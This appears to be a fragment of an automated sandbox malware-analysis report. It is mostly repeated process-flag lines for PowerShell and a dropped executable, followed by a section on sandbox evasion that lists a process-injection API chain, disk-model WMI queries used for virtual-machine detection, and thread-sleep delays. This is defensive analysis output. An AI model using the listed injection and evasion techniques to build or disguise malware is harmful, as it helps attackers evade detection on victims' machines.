Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\$nya-onimai2\IfMUlU.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,8_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\$nya-onimai2\IfMUlU.exeMemory allocated: 246B6B00000 memory reserve | memory write watch
Source: C:\Windows\$nya-onimai2\IfMUlU.exeMemory allocated: 246CEBD0000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5678Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4132Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5740Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3962Jump to behavior
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_8-612
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_8-615
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_8-574
Source: C:\Windows\System32\winlogon.exeAPI coverage: 6.2 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 9.6 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\dwm.exeAPI coverage: 6.1 %
Source: C:\Windows\System32\cmd.exeAPI coverage: 8.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 2.9 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep count: 5678 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep count: 4132 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1004Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 2160Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6680Thread sleep count: 211 > 30Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 4248Thread sleep count: 143 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1216Thread sleep count: 175 > 30Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 5800Thread sleep count: 66 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2260Thread sleep count: 133 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4456Thread sleep count: 134 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3616Thread sleep count: 132 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4176Thread sleep count: 125 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3592Thread sleep count: 90 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6732Thread sleep count: 112 > 30Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5024Thread sleep count: 78 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6840Thread sleep count: 90 > 30
Source: C:\Windows\System32\svchost.exe TID: 5164Thread sleep count: 89 > 30
Source: C:\Windows\System32\svchost.exe TID: 3804Thread sleep count: 86 > 30
Source: C:\Windows\System32\svchost.exe TID: 5664Thread sleep count: 79 > 30
Source: C:\Windows\System32\svchost.exe TID: 1716Thread sleep count: 76 > 30
Source: C:\Windows\System32\svchost.exe TID: 1988Thread sleep count: 79 > 30
Source: C:\Windows\System32\svchost.exe TID: 5368Thread sleep count: 76 > 30
Source: C:\Windows\System32\svchost.exe TID: 2008Thread sleep count: 75 > 30
Source: C:\Windows\System32\svchost.exe TID: 2916Thread sleep count: 73 > 30
Source: C:\Windows\System32\svchost.exe TID: 5952Thread sleep count: 68 > 30
Source: C:\Windows\System32\svchost.exe TID: 5080Thread sleep count: 63 > 30
Source: C:\Windows\System32\svchost.exe TID: 5268Thread sleep count: 59 > 30
Source: C:\Windows\System32\svchost.exe TID: 5744Thread sleep count: 49 > 30
Source: C:\Windows\System32\svchost.exe TID: 5944Thread sleep count: 53 > 30
Source: C:\Windows\System32\svchost.exe TID: 6664Thread sleep count: 48 > 30
Source: C:\Windows\System32\dllhost.exe TID: 4960Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1664Thread sleep count: 44 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 5196Thread sleep count: 34 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
